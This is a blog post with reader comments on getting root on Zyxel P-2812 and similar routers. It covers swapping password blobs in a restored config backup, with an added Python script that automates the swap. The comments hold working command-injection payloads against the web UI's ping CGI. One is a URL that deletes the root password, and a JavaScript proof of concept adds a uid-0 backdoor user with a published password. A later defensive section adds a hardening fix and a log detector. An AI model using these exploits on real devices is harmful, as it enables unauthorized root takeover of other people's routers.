How to get root on Zyxel P-2812

This was done on firmware V3.10(BLN.11); it probably works on the other firmware versions too.
Download it here first if you don't have it.

The config backup is a plain-text file, and the router's passwd and shadow files are stored inside it as base64-encoded gzip streams: the H4sI prefix of each blob is base64 for the bytes 1f 8b 08, the gzip magic followed by the deflate method byte. The two blobs below are passwd and shadow files that carry a known root password (1234), so pasting them in and restoring the backup sets the root password without touching the firmware. Change that password as soon as you are in, since anyone who reads this page knows it.

1. Back up your config file (backup/restore in the router's web GUI); you get a file named config.rom.

2. Open config.rom in Notepad++.
3. Search for Shadow.
4. Select the entire string that begins with H4sI (the rest of it will differ from the one below).
5. Replace it with:

H4sIAHVmwlAAA+2VXW/aMBSGud6voBJXk1piksDIHUNbVlZRVGm7N7FJosYfxDaB/vo5qNok5NNd
oWnqebgI4uHY5/AmhttiPLgykWeWpuer5/J6fk8m0TRKphP/GkQkiuN4MEyv3ViPM5a2w+GgVcq+
9b2/+f8U7vM3FWWqu94efcDTJIHyjwlJfuefzIjPn6RJNBhG12vpD+88/36sbERGo3p5x36YXB/X
61XOHwVhX2s1zkgckTiLsnlPNsuy7MPa0CduCscXsuTNuXhDlt+SdvUQb8R8cf85tW5C8jtfnMwv
ire1zD6GVmWUCwU4ykRYNDr8uTnJAjCVs/5mBzaqaGPDRtC6CRvJOxM2zhVAf0rzllrVhm1JBQeW
LJWuOFC2s8BuUm0VO4Vdq0V2cxMyh8JQQElTMEAZU0Gq1QVsnPFjAbvtzOsEYd9HI13TQB0JYTTg
dEEhRTUtKg6tuXc1NGbHt7SpX8BxjjsDDepzh1aVFmq0ZFCCVFDJoAwLKiXkOikBs6NHqEFumRNQ
k9JZwDQMjECczB5KtWZcQktqZeyuhhrtbxf/w7xRW7Yciki39UEdoTtRH6AoGDfPVkGDtpQdoOD9
2eePzP6QVcsH9+VneU/qxf5x8Ul3zy+LkgT7oMZ0qmXnsv3T5vtMTOJ85QwVuVb5w/Y0ztIoSS4f
htvScQMcgFQqeRLKmVvwnPnX/2UIgiAIgiAIgiAIgiAIgiAIgiAIgiDvmV8MZ8UDACgAAA==

6. Change the Size element that follows the blob from
 <Size PARAMETER="configured" TYPE="uint16" MAX="4095" MIN="0">380</Size>
 to
 <Size PARAMETER="configured" TYPE="uint16" MAX="4095" MIN="0">774</Size>

7. Go down a couple of lines to the Passwd field.
8. Select the entire string that begins with H4sI (again, the rest will differ).
9. Replace it with:

H4sIAOtnwlAAA+3SUY6DIBQFUL67CnfAo0Wb9q9bmHQDNNJogjwjzIyz+6FiEzMx06+maXIPCph3
CRjtTQjftXgqSiqtpzH5O5Le7oXaUkW62pW6FKQUKRIFPfdY2WeIZigKMTDH/3KP6m/q9lrH8Uip
TVOZ+0vrZWg2rk+1fWppIr/MIEPP7KTr6xy5GhfsxvOF65+UPBxu1/woPXs7tiFaH5fps3XW8/Bh
O472VHetn/dfKciGOyvXCvMBzby+JDXdZrFskcw73zdT6Z/L3Wk9HppXfxYAAAAAAAAAAAAAAAAA
AAAAAICHfgEQuB8vACgAAA==

10. Change the Size element that follows the blob from
<Size PARAMETER="configured" TYPE="uint16" MAX="4095" MIN="0">338</Size>
to
<Size PARAMETER="configured" TYPE="uint16" MAX="4095" MIN="0">336</Size>

11. Save the file.

12. Upload config.rom via backup/restore in the router's web GUI.

13. The router will now restart.

14. You can now log in to the router as root :-) (telnet on port 23, SSH and SCP on port 22022)
       Login: root  Password: 1234

If you reset the router to factory defaults it reverts to the old values and you have to repeat the procedure.
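
Steps 3 to 11 done by a script instead of by hand in Notepad++, as an added example (my code, not the blog's or Zyxel's). It decodes the H4sI blob after a marker word, replaces root's line, re-compresses, re-encodes at 76 columns and fixes the Size element that follows, for both the Shadow and the Passwd sections. Facts it relies on: the blobs are base64 gzip, and the gzip trailer of both blobs on this page reports an uncompressed length of 10240 bytes (ISIZE 0x2800), so each file sits zero-padded in a fixed 10 KiB buffer. Assumptions not taken from the page: the Size element holds the used length of that buffer (the page only gives its before/after values), a blob is enclosed in an XML element so a `<` ends it, the sample config at the bottom is constructed with guessed element names (root's /bin/false shell in it exists only to exercise the Passwd step), the file name patch_rom.py is mine, and the $1$ hash is the one posted in comment 6 for the password "omg", so make your own with `openssl passwd -1`.

```python
#!/usr/bin/env python3
"""Rewrite the Shadow/Passwd blobs of a Zyxel config.rom backup (steps 3-11).

Example code, not the blog's or Zyxel's. The H4sI strings are base64 gzip:
H4sI decodes to 1f 8b 08 (gzip magic + deflate method byte), and the gzip
trailer of both blobs on the page gives ISIZE 0x2800 = 10240, so each file
sits zero-padded in a 10 KiB buffer. ASSUMPTIONS not on the page: <Size> is
the used length of that buffer, a blob is followed by an XML closing tag,
and the password hash is made elsewhere (openssl passwd -1 <password>).
"""
import base64
import gzip
import re
import sys

# A base64 gzip blob, possibly wrapped over many lines, ending on a base64 char.
BLOB_RE = re.compile(r"H4sI[A-Za-z0-9+/=]*(?:\s+[A-Za-z0-9+/=]+)*")
# The Size element exactly as it appears in steps 6 and 10 of the post.
SIZE_RE = re.compile(r'(<Size PARAMETER="configured" TYPE="uint16" '
                     r'MAX="4095" MIN="0">)(\d+)(</Size>)')
GZIP_MAGIC = b"\x1f\x8b\x08"
# $1$ hash posted in comment 6 for the password "omg"; replace with your own.
NEW_HASH = "$1$tKyphRcV$VwSPjoXUh8UEb60IOuVOS0"


def decode_blob(blob: str) -> bytes:
    """Same as `base64 -d | gunzip`, after checking the gzip magic."""
    raw = base64.b64decode("".join(blob.split()))
    if raw[:3] != GZIP_MAGIC:
        raise ValueError("blob is not a gzip stream")
    return gzip.decompress(raw)


def encode_blob(data: bytes, width: int = 76) -> str:
    """Same as `gzip | base64`, wrapped at 76 columns like the page's blobs."""
    b64 = base64.b64encode(gzip.compress(data, mtime=0)).decode("ascii")
    return "\n".join(b64[i:i + width] for i in range(0, len(b64), width))


def set_entry(content: bytes, user: str, new_line: bytes) -> bytes:
    """Replace the line for `user` in passwd/shadow text (append if missing)."""
    key = user.encode() + b":"
    lines = [ln for ln in content.rstrip(b"\x00").split(b"\n") if ln]
    if not any(ln.startswith(key) for ln in lines):
        lines.append(new_line)
    return b"\n".join(new_line if ln.startswith(key) else ln for ln in lines) + b"\n"


def patch_section(text: str, marker: str, user: str, new_line: bytes) -> str:
    """Find `marker`, rewrite the H4sI blob after it, fix the <Size> after that."""
    blob = BLOB_RE.search(text, text.index(marker))
    if blob is None:
        raise ValueError(f"no H4sI blob after {marker!r}")
    buf = decode_blob(blob.group())                      # 10240 bytes on the page
    content = set_entry(buf, user, new_line)
    if len(content) > len(buf) or len(content) > 4095:  # buffer and uint16 MAX
        raise ValueError("new file does not fit")
    new_blob = encode_blob(content.ljust(len(buf), b"\x00"))  # keep size, zero pad
    text = text[:blob.start()] + new_blob + text[blob.end():]
    size = SIZE_RE.search(text, blob.start() + len(new_blob))
    if size is None:
        raise ValueError(f"no <Size> element after the {marker!r} blob")
    return text[:size.start(2)] + str(len(content)) + text[size.end(2):]


def shadow_line(user: str, pw_hash: str, lastchg: int = 13013) -> bytes:
    return f"{user}:{pw_hash}:{lastchg}:0:99999:7:::".encode()


def passwd_line(user: str) -> bytes:
    return f"{user}:x:0:0:{user}:/root:/bin/sh".encode()  # uid 0, shell /bin/sh


def patch_config(text: str, pw_hash: str, user: str = "root") -> str:
    """Steps 3-10: the Shadow field first, then the Passwd field below it."""
    text = patch_section(text, "Shadow", user, shadow_line(user, pw_hash))
    return patch_section(text, "Passwd", user, passwd_line(user))


# Constructed sample in the layout the post shows; element names are guesses.
BUF_LEN = 10240
SAMPLE_SHADOW = b"root:$1$oldsaltx$oldhasholdhasholdhashoo:13013:0:99999:7:::\n"
SAMPLE_PASSWD = (b"root:x:0:0:root:/root:/bin/false\n"
                 b"nobody:x:65534:65534:nobody:/:/bin/false\n")


def make_sample_config() -> str:
    def section(tag: str, content: bytes) -> str:
        blob = encode_blob(content.ljust(BUF_LEN, b"\x00"))
        return (f'<{tag} PARAMETER="configured" TYPE="string">\n{blob}\n</{tag}>\n'
                f'<Size PARAMETER="configured" TYPE="uint16" MAX="4095" MIN="0">'
                f'{len(content)}</Size>\n')
    return section("Shadow", SAMPLE_SHADOW) + section("Passwd", SAMPLE_PASSWD)


def section_content(text: str, marker: str) -> bytes:
    """Decoded file behind the blob after `marker`, padding stripped."""
    return decode_blob(BLOB_RE.search(text, text.index(marker)).group()).rstrip(b"\x00")


if __name__ == "__main__":
    if len(sys.argv) == 3:                    # patch_rom.py config.rom patched.rom
        with open(sys.argv[1], encoding="utf-8", errors="surrogateescape") as f:
            patched = patch_config(f.read(), NEW_HASH)
        with open(sys.argv[2], "w", encoding="utf-8", errors="surrogateescape") as f:
            f.write(patched)
    else:                                     # demo on the constructed sample
        print(section_content(patch_config(make_sample_config(), NEW_HASH), "Shadow").decode())
```

Run it as `python3 patch_rom.py config.rom patched.rom` and upload patched.rom in step 12; without arguments it patches the constructed sample and prints the resulting shadow file. To look at a blob by hand, paste it into a file and run `base64 -d file | gunzip`; the output is the 10 KiB buffer, so expect trailing NUL bytes after the last line. If the router rejects the restored file, the Size assumption is the first thing to revisit: compare the number the script wrote against the values the post gives for its own blobs.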

Useful software:
WinSCP
PuTTY
Notepad++

20 comments:

  1. Hi, I have this model: Zyxel P-2812HNU-F1

    What's the difference?

    Can i root same method?

  2. If the files are similar then you can probably use the same method, since the only difference between the F1 and the F3 is that the F1 is Annex A and the F3 is Annex B.

  3. This comment has been removed by a blog administrator.

  4. No, the files aren't similar. My firmware is a special ISP version.

  5. Thanks! The method works fine with V3.10(BLN.12).

    I took a look at their web interface implementation. WOW. Like in the good old 90s:
    # strings /usr/share/web/ping.cgi | grep 'ping '
    ping %s -c 4 2>&1

    And guess what - httpd is running as root.
    So in Maintenance -> Diagnostics, instead of a server name type:
    ; id ; echo

    And it outputs:
    uid=0(root) gid=0(root)

    I think we can get root with just a couple of pings :)

    Replies
    1. This comment has been removed by the author.

    2. I don't have the same router, I have a ZyXEL PK5001z, but they are pretty similar. However, the PK5001z firmware at least is SHIT! (Tons of zombie sh processes...)

      Anyway, haxx: http://192.168.0.1/pingtrace.cgi?pingSize=32&pingAddr=%60passwd%20-d%20root%60

    3. I forgot. I don't know if this will work on the P-2812 (I think it might not - you might need to change the CGI filename and the parameters), but on the PK5001z at least, you can just log in to the web interface and copy/paste that into the address bar.

    4. Sorry about the double comment, and the last comment was supposed to start "I forgot to say that I don't..."

    5. This comment has been removed by the author.

  6. Here's a POC javascript:
    Using Chrome, open the web UI and log in as a normal user. In Chrome go to View -> Developer -> Open JavaScript Console.

    Copy and paste the following:

    lol_cmds = [";echo '#!/bin/sh' >/tmp/b ;",
                ";echo -n echo lol >>/tmp/b ;",
                ";echo -n :x:0:0:OM >>/tmp/b ;",
                ";echo -n G,,,:/roo >>/tmp/b ;",
                ";echo -n t:/bin/s >>/tmp/b ;",
                ";echo -n 'h >>' >>/tmp/b ;",
                ";echo /etc/passwd >>/tmp/b ;",
                ";echo -n \"echo '\" >>/tmp/b ;",
                ";echo -n lol >>/tmp/b ;",
                ";echo -n ':$1$tKy' >>/tmp/b ;",
                ";echo -n 'phRcV$V' >>/tmp/b ;",
                ";echo -n wSPjoXUh8 >>/tmp/b ;",
                ";echo -n UEb60IOuV >>/tmp/b ;",
                ";echo -n OS0:13013 >>/tmp/b ;",
                ";echo -n :0:99999: >>/tmp/b ;",
                ";echo -n \"7:::' \" >>/tmp/b ;",
                ";echo -n '>>' >>/tmp/b ;",
                ";echo -n /etc/shad >>/tmp/b ;",
                ";echo ow >>/tmp/b ;",
                ";chmod +x /tmp/b ;",
                "; /tmp/b ;"];
    lol_i = 0;
    // Each entry is sent as the IPaddress parameter of ping.cgi, which pastes it
    // into its ping command line (see comment 5). The short pieces build /tmp/b,
    // a script that appends a uid-0 user "lol" to /etc/passwd and /etc/shadow,
    // and the last entry runs it. $.post assumes the web UI loads jQuery.
    function lol() {
        if (lol_i < lol_cmds.length) {
            $.post("../../../ping.cgi", {ping: 1, IPaddress: lol_cmds[lol_i++]});
            window.setTimeout(lol, 1500);
        } else {
            alert('All done!');
        }
    }
    alert('Hit Enter and wait for "All done!" alert\r\nUser: lol, password: omg');
    lol();


    And press Enter.
    You can now log in via telnet/ssh with user lol and password omg.

    Replies
    1. LOL2812,

      your POC script is working on my P2812, but how can I get root on my modem? My firmware: V3.10(TUI.7)ex

      The config method does not work for me.

      Which command works on this modem?
      Or how can I flash universal firmware via tftp or telnet?

      Thank you

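
The ping.cgi injection from comment 5 and its replies, and the script in comment 6, from the defender's side, as an added example (my code, not from the page or from Zyxel): the vulnerable command line as comment 5 found it with `strings`, a hardened replacement that validates the host and builds a fixed argv for execv() instead of a shell string, and a detector that runs over httpd access-log lines and flags host parameters that could never be a host. Assumptions not on the page: the CGI passes the formatted string to a shell, the log is in common log format, the log lines are constructed by me (the two payloads are the ones posted in the thread), and the parameter names are the two the thread shows (IPaddress for ping.cgi, pingAddr for pingtrace.cgi). Caveat: the comment-6 script POSTs its payloads, and a POST body never appears in an access log, so this detector only sees the GET variant; catching the POST one needs request-body logging or a network capture.

```python
"""Spot and prevent the ping.cgi command injection from comments 5 and 6.

Example code, not from the page or from Zyxel. ASSUMPTIONS: the CGI formats
`ping %s -c 4 2>&1` (the string comment 5 pulled out of ping.cgi) and hands
it to a shell; the access log is in common log format; the sample lines are
constructed. POST bodies (the comment-6 script) are not in an access log.
"""
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Host parameters the thread shows: IPaddress (ping.cgi), pingAddr (pingtrace.cgi).
HOST_PARAMS = ("IPaddress", "pingAddr")
# RFC 1123 host name. A leading '-' is rejected too, so the value can never be
# parsed by ping as an option even though it lands in a fixed argv slot.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$")
LOG_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d+)')


def vulnerable_cmdline(host: str) -> str:
    """What the CGI hands to the shell: the host is pasted in unquoted."""
    return "ping %s -c 4 2>&1" % host


def validate_host(value: str) -> str:
    """Return `value` if it is an IP literal or a plain host name, else raise."""
    try:
        return str(ipaddress.ip_address(value))
    except ValueError:
        pass
    if HOSTNAME_RE.match(value):
        return value
    raise ValueError("not a host: %r" % value)


def safe_ping_argv(host: str) -> list:
    """Hardened form: fixed argv for execv(), no shell, host validated first."""
    return ["ping", "-c", "4", validate_host(host)]


def suspicious_params(target: str) -> list:
    """(name, decoded value) for every host parameter that is not a host."""
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    hits = []
    for name in HOST_PARAMS:
        for value in query.get(name, []):       # parse_qs already %-decodes
            try:
                validate_host(value)
            except ValueError:
                hits.append((name, value))
    return hits


def scan_log(lines) -> list:
    """(source ip, param, payload) for each request whose host looks injected."""
    found = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        for name, value in suspicious_params(m.group("target")):
            found.append((m.group("src"), name, value))
    return found


# Constructed access-log sample: the two payloads from the thread, two benign pings.
SAMPLE_LOG = """\
192.168.1.50 - - [10/Dec/2012:21:03:11 +0100] "GET /pingtrace.cgi?pingSize=32&pingAddr=%60passwd%20-d%20root%60 HTTP/1.1" 200 512
192.168.1.50 - - [10/Dec/2012:21:04:02 +0100] "GET /ping.cgi?ping=1&IPaddress=%3B%20id%20%3B%20echo HTTP/1.1" 200 300
192.168.1.7 - - [10/Dec/2012:21:05:40 +0100] "GET /ping.cgi?ping=1&IPaddress=8.8.8.8 HTTP/1.1" 200 410
192.168.1.7 - - [10/Dec/2012:21:06:01 +0100] "GET /ping.cgi?ping=1&IPaddress=www.example.com HTTP/1.1" 200 410
"""

if __name__ == "__main__":
    for src, name, payload in scan_log(SAMPLE_LOG.splitlines()):
        print(f"{src} {name}={payload!r} -> shell would run {vulnerable_cmdline(payload)!r}")
    print("hardened argv:", safe_ping_argv("8.8.8.8"))
```

The fix is the argv, not the regex: with `["ping", "-c", "4", host]` handed to execv() there is no shell to interpret `;` or backticks at all, and the validation only remains to keep a hostile value from becoming a ping option. The other half of comment 5's finding, httpd running as root, is what turned a ping bug into a root shell; the same CGI under an unprivileged account would still be a bug, but the script in comment 6 could not have written /etc/shadow.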
  7. Look here, a few steps; I hope someone can manage better than me.

    https://forum.openwrt.org/viewtopic.php?id=46616

  8. What are the advantages of rooting the router? I have been plagued by an incredibly unstable connection for the past week. The network drops out as often as every other minute. Telenor has troubleshot the line but finds nothing, so I think the modem is the culprit.

  9. Hi, could somebody help me get root on or replace the firmware of my P-2812HNU-F1 from Telfort (with customized firmware)?
    Thanks!

  10. https://forum.openwrt.org/viewtopic.php?pid=215706
    getting control of one's router with a script that the original firmware calls if it exists

  11. I'm curious how the password is generated, could you provide me some info or links to the used algorithm? Thanks!

  12. Thanks for this post. Worked perfectly, and on later firmware.

  13. https://gist.github.com/oxagast/32b058397e95ba762ac30e8520218417 GitHub gist of the remote root exploit for the PK5001z CenturyLink-branded router.
